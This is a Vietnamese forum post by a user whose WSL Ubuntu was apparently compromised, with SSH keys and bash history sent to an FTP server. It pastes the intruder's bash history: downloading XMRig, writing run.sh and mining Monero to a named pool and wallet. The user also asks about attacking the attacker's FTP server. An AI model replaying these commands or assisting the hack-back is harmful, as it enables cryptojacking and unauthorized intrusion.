Hiện tại ko hiểu sao cái WSL Ubuntu lại dính con , nó truy cập vào lấy hết ssh key và bash history và up lên server của nó ftp://quotidian.com https://medium.com/gomycode/the-xmrig-trojan-miner-22ffd2a5b35c 1-Có câch nào để check con trojan naỳ xâm nhập máy mình kiểu gì ko nhỉ? 2- có câch nào phá cái ftp server của nó ko? Hiện tại nó mở public nên làm gì với ftp server nó cũng đc.
App win crack thì chắc chắn có rồi. nếu bị dính trên win thì cũng hiểu được. Nhưng là dính trên WSL Ubuntu, kiểu virtual machine, mà container này thì ko cài gì. dính từ ngày mùng 4 vừa rồi, mà khá lâu rồi ko cài đăt gì.
Cơ bản là không chỉ có cài 1 số lib của python. Thấy nó dường như nó làm cách nào đó vào để dùng terminal được mà không mở ssh-server ? Spoiler 108 07/09/21 22:33:20 lscpu 109 07/09/21 22:33:20 clear 110 07/09/21 22:33:20 df -h 111 07/09/21 22:33:20 clear 112 07/09/21 22:33:20 lscpu 113 07/09/21 22:33:20 top 114 07/09/21 22:33:20 cd /tmp/ 115 07/09/21 22:33:20 ls 116 07/09/21 22:33:20 curl -L https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-x64.tar.gz > xmrig-6.12.1-linux-x64.tar.gz; 117 07/09/21 22:33:20 tar zvxf xmrig-6.12.1-linux-x64.tar.gz; 118 07/09/21 22:33:20 cd xmrig-6.12.1/; 119 07/09/21 22:33:20 touch run.sh; 120 07/09/21 22:33:20 chmod +x run.sh; 121 07/09/21 22:33:20 echo "./xmrig -o xmr-asia1.nanopool.org:14433 -u 87ErVouzBGuHxGqPz4ohKS5wtNXDvGvGjPvcdacTg8zN2vN9yAqz3DMWeLvKtLmA6uLz58FaipeCeUamcC8Gnh179HiELwD.CHINA02/[email protected] --tls --coin monero;" > run.sh; 122 07/09/21 22:33:20 ./run.sh; 123 07/09/21 22:33:20 ls 124 07/09/21 22:33:20 ./xmrig -o xmr-asia1.nanopool.org:14433 -u 87ErVouzBGuHxGqPz4ohKS5wtNXDvGvGjPvcdacTg8zN2vN9yAqz3DMWeLvKtLmA6uLz58FaipeCeUamcC8Gnh179HiELwD.CHINA02/[email protected] --tls --coin monero; 125 07/09/21 22:33:20 ls 126 07/09/21 22:33:20 top 127 07/09/21 22:33:20 nvidia-smi 128 07/09/21 22:33:20 lspci | grep -i vga
